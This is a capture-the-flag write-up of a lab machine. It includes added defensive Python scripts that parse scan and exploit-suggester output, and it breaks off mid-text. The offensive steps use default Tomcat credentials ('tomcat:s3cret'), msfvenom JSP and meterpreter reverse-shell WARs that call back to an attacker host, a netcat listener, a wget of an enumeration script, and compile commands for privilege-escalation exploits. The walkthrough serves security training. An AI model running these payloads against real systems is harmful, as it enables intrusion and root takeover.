# VHL — Core

Misc · Easy · Linux

Legacy Ubuntu server with Apache 2.2 and Dovecot POP3. Enumerated mail service for credentials enabling SSH access to root.

February 16, 2025 · Virtual Hacking Labs

#Apache #POP3 #Dovecot #Credential Enum
## nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.160
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 15:21 EST
Nmap scan report for 10.11.1.160
Host is up (0.022s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 de:31:a4:e4:f8:c6:58:93:47:b8:2a:52:00:aa:f3:fd (DSA)
|_ 2048 86:39:8e:7b:f4:8d:c8:e9:92:a2:f9:c4:c2:97:b1:98 (RSA)
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP CAPA STLS SASL PIPELINING RESP-CODES UIDL
|_ssl-date: 2025-02-16T20:21:48+00:00; 0s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
| ssl-cert: Subject: commonName=core/organizationName=Dovecot mail server
| Not valid before: 2016-12-21T14:07:44
|_Not valid after: 2017-12-21T14:07:44
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_ssl-date: 2025-02-16T20:21:48+00:00; 0s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
| ssl-cert: Subject: commonName=core/organizationName=Dovecot mail server
| Not valid before: 2016-12-21T14:07:44
|_Not valid after: 2017-12-21T14:07:44
|_imap-capabilities: LOGIN-REFERRALS Capability NAMESPACE OK ID ESEARCH LOGINDISABLEDA0001 STARTTLS THREAD=REFERENCES LITERAL+ SORT=DISPLAY IDLE CONTEXT=SEARCH MULTIAPPEND SASL-IR CHILDREN I18NLEVEL=1 SORT ESORT WITHIN UNSELECT QRESYNC THREAD=REFS SEARCHRES CONDSTORE LIST-EXTENDED completed ENABLE IMAP4rev1 UIDPLUS
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
|_ssl-date: 2025-02-16T20:21:48+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=core/organizationName=Dovecot mail server
| Not valid before: 2016-12-21T14:07:44
|_Not valid after: 2017-12-21T14:07:44
| sslv2:
| SSLv2 supported
|_ ciphers: none
|_imap-capabilities: LOGIN-REFERRALS NAMESPACE Capability ID ESEARCH OK AUTH=PLAINA0001 THREAD=REFERENCES LITERAL+ SORT=DISPLAY IDLE CONTEXT=SEARCH MULTIAPPEND SASL-IR CHILDREN I18NLEVEL=1 SORT ESORT WITHIN UNSELECT QRESYNC THREAD=REFS SEARCHRES CONDSTORE LIST-EXTENDED completed ENABLE IMAP4rev1 UIDPLUS
995/tcp open ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=core/organizationName=Dovecot mail server
| Not valid before: 2016-12-21T14:07:44
|_Not valid after: 2017-12-21T14:07:44
|_ssl-date: 2025-02-16T20:21:48+00:00; 0s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-open-proxy: Proxy might be redirecting requests
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: CORE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
TRACEROUTE
HOP RTT ADDRESS
1 22.44 ms 10.11.1.160
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.45 seconds
```
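Added example, not part of the original writeup: a small Python triage script that parses `nmap -sV` output like the scan above and pulls out the findings a defender would fix first: SSLv2 still offered on the Dovecot ports, a certificate that expired in 2017, SMB signing disabled, PUT/DELETE enabled on Tomcat, and the end-of-life Apache 2.2 branch. The sample input is an abbreviated copy of the scan output above; the EOL table and the severity labels are my own assumptions.

```python
import re
from datetime import datetime

# Sample input: an abbreviated copy of the nmap output above (only the lines the triage uses).
SCAN = """\
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 15:21 EST
Nmap scan report for 10.11.1.160
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
|_http-server-header: Apache/2.2.14 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
| sslv2:
| SSLv2 supported
|_ ciphers: none
| ssl-cert: Subject: commonName=core/organizationName=Dovecot mail server
| Not valid before: 2016-12-21T14:07:44
|_Not valid after: 2017-12-21T14:07:44
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
Host script results:
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
"""

START_RE = re.compile(r"^Starting Nmap .* at (\d{4}-\d{2}-\d{2})")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
EXPIRY_RE = re.compile(r"Not valid after:\s*(\d{4}-\d{2}-\d{2})")
METHODS_RE = re.compile(r"Potentially risky methods:\s*(.+)$")

# Version prefixes known to be end-of-life (assumption: extend this table for your own estate).
EOL_FAMILIES = {
    "Apache httpd 2.2": "Apache httpd 2.2 branch is end-of-life (last release in 2017)",
}


def parse_scan(text):
    """Split nmap output into (scan_date, {port: info}, host_script_lines).

    NSE lines ("| ..." / "|_...") are attached to the port line that precedes
    them; lines after "Host script results:" go into the host bucket.
    """
    scan_date, ports, host_lines = None, {}, []
    current, in_host_scripts = None, False
    for raw in text.splitlines():
        line = raw.rstrip()
        m = START_RE.match(line)
        if m:
            scan_date = datetime.strptime(m.group(1), "%Y-%m-%d").date()
            continue
        if line.startswith("Host script results"):
            in_host_scripts, current = True, None
            continue
        m = PORT_RE.match(line)
        if m:
            in_host_scripts = False
            key = f"{m.group(1)}/{m.group(2)}"
            current = ports[key] = {"service": m.group(3), "version": m.group(4), "scripts": []}
            continue
        if line.startswith("|"):
            body = line.lstrip("|_ ").strip()  # drop the NSE tree prefix
            if in_host_scripts:
                host_lines.append(body)
            elif current is not None:
                current["scripts"].append(body)
    return scan_date, ports, host_lines


def triage(text):
    """Return (port, severity, message) findings, lowest port first."""
    scan_date, ports, host_lines = parse_scan(text)
    findings = []
    for port, info in sorted(ports.items(), key=lambda kv: int(kv[0].split("/")[0])):
        for prefix, note in EOL_FAMILIES.items():
            if info["version"].startswith(prefix):
                findings.append((port, "high", note))
        for body in info["scripts"]:
            if body == "SSLv2 supported":
                findings.append((port, "high", "SSLv2 offered; disable SSLv2/SSLv3 and require TLS 1.2+"))
            m = EXPIRY_RE.search(body)
            if m and scan_date is not None:
                expiry = datetime.strptime(m.group(1), "%Y-%m-%d").date()
                if expiry < scan_date:
                    findings.append((port, "medium", f"TLS certificate expired on {expiry}"))
            m = METHODS_RE.search(body)
            if m:
                findings.append((port, "medium", f"HTTP methods {m.group(1)} enabled; restrict to what the app needs"))
    for body in host_lines:
        if body.startswith("message_signing: disabled"):
            findings.append(("smb", "medium", "SMB message signing disabled; enforce signing on the file server"))
    return findings


if __name__ == "__main__":
    for port, severity, message in triage(SCAN):
        print(f"{port:9} {severity:6} {message}")
```

The parser keys on the NSE tree prefix (`|` / `|_`) rather than on script names, so the same loop picks up `ssl-cert`, `sslv2` and `http-methods` output from any port; the expiry check compares against the scan date printed in the `Starting Nmap` line rather than today's clock, so the result is reproducible from a saved scan.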
## 80

```sh
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
```

## 8080

weak creds: `tomcat:s3cret`
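Added example, not part of the original writeup: the `tomcat:s3cret` pair is the example account that ships commented out in Tomcat's stock `tomcat-users.xml`, which is why it is tried first on any exposed manager. The Python audit below reads a `tomcat-users.xml` and flags accounts with well-known, username-equal or short passwords, rating them high when the account also holds a manager or admin role (the roles that let a war be deployed, as in this box). The XML is a constructed sample, not the target's file; the password list, role list and 12-character minimum are my own assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample tomcat-users.xml (not copied from the target). The tomcat/s3cret pair
# mirrors the example pair in Tomcat's stock file.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <role rolename="reporting"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="both" password="tomcat" roles="tomcat,role1"/>
  <user username="ci-deploy" password="Qm7!vX2#pLr9wZ" roles="manager-script"/>
  <user username="viewer" password="viewer" roles="reporting"/>
</tomcat-users>
"""

# Passwords from Tomcat's shipped examples and common wordlists (assumption: extend as needed).
KNOWN_DEFAULT_PASSWORDS = {"tomcat", "s3cret", "admin", "password", "manager", "changeme", ""}
# Roles that grant deployment or administration through the manager / host-manager apps.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                    "admin-gui", "admin-script"}
MIN_LENGTH = 12


def _local_name(tag):
    """Strip the XML namespace (newer files declare one; Tomcat 6 era files do not)."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return one finding per weak account: {'user', 'severity', 'roles', 'problems'}."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if _local_name(el.tag) != "user":
            continue
        # Old Tomcat releases used name= instead of username=; accept both.
        name = el.get("username") or el.get("name") or ""
        password = el.get("password") or ""
        roles = {r.strip() for r in (el.get("roles") or "").split(",") if r.strip()}
        privileged = sorted(roles & PRIVILEGED_ROLES)
        problems = []
        if password in KNOWN_DEFAULT_PASSWORDS:
            problems.append("well-known default password")
        elif password == name:
            problems.append("password equals username")
        elif len(password) < MIN_LENGTH:
            problems.append(f"password shorter than {MIN_LENGTH} characters")
        if not problems:
            continue
        findings.append({
            "user": name,
            "severity": "high" if privileged else "medium",
            "roles": privileged,
            "problems": problems,
        })
    return findings


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        extra = f" (privileged roles: {', '.join(f['roles'])})" if f["roles"] else ""
        print(f"[{f['severity']}] {f['user']}: {', '.join(f['problems'])}{extra}")
```

Point it at `$CATALINA_BASE/conf/tomcat-users.xml`; on this box the manager is also reachable on 8080 from the network, so beyond fixing the accounts the manager app should be bound to localhost or fenced with a `RemoteAddrValve`.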

```sh
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.1 LPORT=443 -f war > rev.wa
```

```sh
rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.160] 59221
whoami
tomcat6
```

```sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

## priv esc
```sh
tomcat6@core:/$ uname -a
uname -a
Linux core 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux
```

```sh
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN 1158/java
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN 1158/java
```

```sh
╔══════════╣ Useful software
/usr/bin/authbind
/usr/bin/base64
/usr/bin/make
/bin/nc
/bin/netcat
/usr/bin/perl
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.6
/usr/bin/sudo
/usr/bin/wget
```

## pt_chown SUID

```sh
-rwsr-xr-x 1 root root 9.5K 2010-04-22 13:15 /usr/lib/pt_chown ---> GNU_glibc_2.1/2.1.1_-6(08-1999)
```

```sh
docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:4.8 gcc 19467.c -o 19467
```

```sh
tomcat6@core:/tmp$ ls -l /usr/lib/pt_chown
ls -l /usr/lib/pt_chown
-rwsr-xr-x 1 root root 9676 2010-04-22 13:15 /usr/lib/pt_chown
tomcat6@core:/tmp$ ls -l /dev/pts/
ls -l /dev/pts/
total 0
crw--w---- 1 tomcat6 tty 136, 0 2025-02-16 16:10 0
c--------- 1 root root 5, 2 2025-02-16 15:20 ptmx
```

## linux exploit suggester
```sh
wget http://172.16.1.1/linux-exploit-suggester.sh
--2025-02-16 16:22:50-- http://172.16.1.1/linux-exploit-suggester.sh
Connecting to 172.16.1.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 90858 (89K) [text/x-sh]
Saving to: `linux-exploit-suggester.sh'
100%[======================================>] 90,858 --.-K/s in 0.07s
2025-02-16 16:22:50 (1.23 MB/s) - `linux-exploit-suggester.sh' saved [90858/90858]
tomcat6@core:/tmp$ chmod +x linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
tomcat6@core:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Available information:
Kernel version: 2.6.32
Architecture: i686
Distribution: ubuntu
Distribution version: 10.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
81 kernel space exploits
49 user space exploits
Possible Exploits:
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,[ ubuntu=10.04{kernel:2.6.32-21-generic} ],ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2010-3904] rds
Details: http://www.securityfocus.com/archive/1/514379
Exposure: highly probable
Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},[ ubuntu=10.04{kernel:2.6.32-(21|24)-generic} ]
Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
Details: http://vulnfactory.org/exploits/full-nelson.c
Exposure: probable
Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},[ ubuntu=10.04 ]{kernel:2.6.32-(21|24)-server}
Download URL: http://vulnfactory.org/exploits/full-nelson.c
[+] [CVE-2010-3848,CVE-2010-3850,CVE-2010-4073] half_nelson
Details: https://www.exploit-db.com/exploits/17787/
Exposure: probable
Tags: [ ubuntu=(10.04|9.10) ]{kernel:2.6.(31|32)-(14|21)-server}
Download URL: https://www.exploit-db.com/download/17787
[+] [CVE-2010-3437] pktcdvd
Details: https://www.exploit-db.com/exploits/15150/
Exposure: probable
Tags: [ ubuntu=10.04 ]
Download URL: https://www.exploit-db.com/download/15150
[+] [CVE-2010-3301] ptrace_kmod2
Details: https://www.exploit-db.com/exploits/15023/
Exposure: probable
Tags: debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},[ ubuntu=(10.04|10.10) ]{kernel:2.6.(32|35)-(19|21|24)-server}
Download URL: https://www.exploit-db.com/download/15023
[+] [CVE-2010-2959] can_bcm
Details: https://www.exploit-db.com/exploits/14814/
Exposure: probable
Tags: [ ubuntu=10.04 ]{kernel:2.6.32-24-generic}
Download URL: https://www.exploit-db.com/download/14814
[+] [CVE-2010-0832] PAM MOTD
Details: https://www.exploit-db.com/exploits/14339/
Exposure: probable
Tags: [ ubuntu=9.10|10.04 ]
Download URL: https://www.exploit-db.com/download/14339
Comments: SSH access to non privileged user is needed
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
[+] [CVE-2017-1000370,CVE-2017-1000371] linux_offset2lib
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_offset2lib.c
Comments: Uses "Stack Clash" technique
[+] [CVE-2017-1000366,CVE-2017-1000371] linux_ldso_dynamic
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Tags: debian=9|10,ubuntu=14.04.5|16.04.2|17.04,fedora=23|24|25
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_dynamic.c
Comments: Uses "Stack Clash" technique, works against most SUID-root PIEs
[+] [CVE-2017-1000366,CVE-2017-1000370] linux_ldso_hwcap
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap.c
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2017-0358] ntfs-3g-modprobe
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
Exposure: less probable
Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41356.zip
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
[+] [CVE-2016-6663,CVE-2016-6664|CVE-2016-6662] mysql-exploit-chain
Details: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
Exposure: less probable
Tags: ubuntu=16.04.1
Download URL: http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
Comments: Also MariaDB ver<10.1.18 and ver<10.0.28 affected
[+] [CVE-2014-5119] __gconv_translit_find
Details: http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
Exposure: less probable
Tags: debian=6
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34421.tar.gz
[+] [CVE-2014-0196] rawmodePTY
Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
Exposure: less probable
Download URL: https://www.exploit-db.com/download/33516
[+] [CVE-2013-2094] semtex
Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: less probable
Tags: RHEL=6
Download URL: https://www.exploit-db.com/download/25444
[+] [CVE-2013-0268] msr
Details: https://www.exploit-db.com/exploits/27297/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/27297
[+] [CVE-2010-4347] american-sign-language
Details: https://www.exploit-db.com/exploits/15774/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/15774
[+] [CVE-2010-3081] video4linux
Details: https://www.exploit-db.com/exploits/15024/
Exposure: less probable
Tags: RHEL=5
Download URL: https://www.exploit-db.com/download/15024
[+] [CVE-2010-1146] reiserfs
Details: https://jon.oberheide.org/blog/2010/04/10/reiserfs-reiserfs_priv-vulnerability/
Exposure: less probable
Tags: ubuntu=9.10
Download URL: https://jon.oberheide.org/files/team-edward.py
```
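Added example, not part of the original writeup: a Python parser for linux-exploit-suggester output like the listing above that turns it into a patch-priority list for the host owner. It reads each `[+] [CVE-...] name` entry with its `Exposure`, `Tags` and `Comments` lines, and treats the tag that LES prints in square brackets (for instance `[ ubuntu=10.04{kernel:2.6.32-21-generic} ]`) as the one that matched this host, so the "highly probable" entries whose kernel string matched land at the top. The sample input is an abbreviated copy of the output above; the ranking order is my own choice.

```python
import re

# Sample input: an abbreviated copy of the linux-exploit-suggester output above.
LES_OUTPUT = """\
Available information:
Kernel version: 2.6.32
Architecture: i686
Distribution: ubuntu
Distribution version: 10.04
Possible Exploits:
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,[ ubuntu=10.04{kernel:2.6.32-21-generic} ],ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
[+] [CVE-2010-3904] rds
Details: http://www.securityfocus.com/archive/1/514379
Exposure: highly probable
Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},[ ubuntu=10.04{kernel:2.6.32-(21|24)-generic} ]
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
[+] [CVE-2010-0832] PAM MOTD
Details: https://www.exploit-db.com/exploits/14339/
Exposure: probable
Tags: [ ubuntu=9.10|10.04 ]
Comments: SSH access to non privileged user is needed
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
Details: http://vulnfactory.org/exploits/full-nelson.c
Exposure: probable
Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},[ ubuntu=10.04 ]{kernel:2.6.32-(21|24)-server}
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
"""

EXPOSURE_RANK = {"highly probable": 0, "probable": 1, "less probable": 2}
HEADER_RE = re.compile(r"^\[\+\] \[([^\]]+)\] (.+)$")
FIELD_RE = re.compile(r"^(Details|Exposure|Tags|Download URL|ext-url|Comments): (.*)$")
MATCHED_RE = re.compile(r"\[ ([^\]]+) \]")  # LES brackets the tag that matched this host


def parse_les(text):
    """Return one dict per [+] entry: name, cves, exposure, tags, matched, comments."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = HEADER_RE.match(line)
        if m:
            # CVE lists use "," and occasionally "|" as separators in LES output.
            cur = {"name": m.group(2), "cves": re.split(r"[,|]", m.group(1)),
                   "exposure": "unknown", "tags": "", "matched": [], "comments": ""}
            entries.append(cur)
            continue
        m = FIELD_RE.match(line)
        if cur is None or not m:
            continue  # banner lines, bare continuation URLs, etc.
        field, value = m.group(1), m.group(2).strip()
        if field == "Exposure":
            cur["exposure"] = value
        elif field == "Tags":
            cur["tags"] = value
            cur["matched"] = MATCHED_RE.findall(value)
        elif field == "Comments":
            cur["comments"] = value
    return entries


def prioritized(text):
    """Entries ordered by exposure level, host-matched ones first within each level."""
    return sorted(parse_les(text),
                  key=lambda e: (EXPOSURE_RANK.get(e["exposure"], 9), not e["matched"], e["name"]))


def cves_by_exposure(text):
    """Map each exposure level to the sorted set of CVE ids to check against the patch state."""
    out = {}
    for e in parse_les(text):
        out.setdefault(e["exposure"], set()).update(e["cves"])
    return {level: sorted(ids) for level, ids in out.items()}


if __name__ == "__main__":
    for e in prioritized(LES_OUTPUT):
        flag = "match" if e["matched"] else "     "
        print(f"{e['exposure']:16} {flag} {', '.join(e['cves']):40} {e['name']}")
        if e["comments"]:
            print(f"{'':22} note: {e['comments']}")
```

The `Comments` field is kept because it often carries the precondition that decides whether an entry matters at all (the PAM MOTD entry needs an SSH login; the nft_object entry needs unprivileged user namespaces), which is the first thing to verify before treating a "probable" hit as a real exposure.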
## rds CVE-2010-3904

```sh
docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:4.8 gcc 15285.c -o 15285
```

## metasploit (post/multi/recon/local_exploit_suggester)
```sh
msfvenom -p java/meterpreter/reverse_tcp LHOST=172.16.1.1 LPORT=443 -f war > rev2.war
```
```sh
meterpreter > run post/multi/recon/local_exploit_suggester SHOWDESCRIPTION=true
[*] 10.11.1.160 - Collecting local exploits for java/linux...
[*] 10.11.1.160 - 198 exploit checks are being tried...
[+] 10.11.1.160 - exploit/linux/local/glibc_ld_audit_dso_load_priv_esc: The service is running, but could not be validated. /bin/ping is not setuid
This module attempts to gain root privileges on Linux systems by
abusing a vulnerability in the GNU C Library (glibc) dynamic linker.
glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does
not properly restrict use of the LD_AUDIT environment variable when
loading setuid executables. This allows loading arbitrary shared
objects from the trusted library search path with the privileges of
the suid user. This module uses LD_AUDIT to load the libpcprofile.so
shared object, distributed with some versions of glibc, and
leverages arbitrary file creation functionality in the library
constructor to write a root-owned world-writable file to a system
trusted search path (usually /lib). The file is then overwritten
with a shared object then loaded with LD_AUDIT resulting in
arbitrary code execution. This module has been tested successfully
on glibc version 2.11.1 on Ubuntu 10.04 x86_64 and version 2.7 on
Debian 5.0.4 i386. RHEL 5 is reportedly affected, but untested. Some
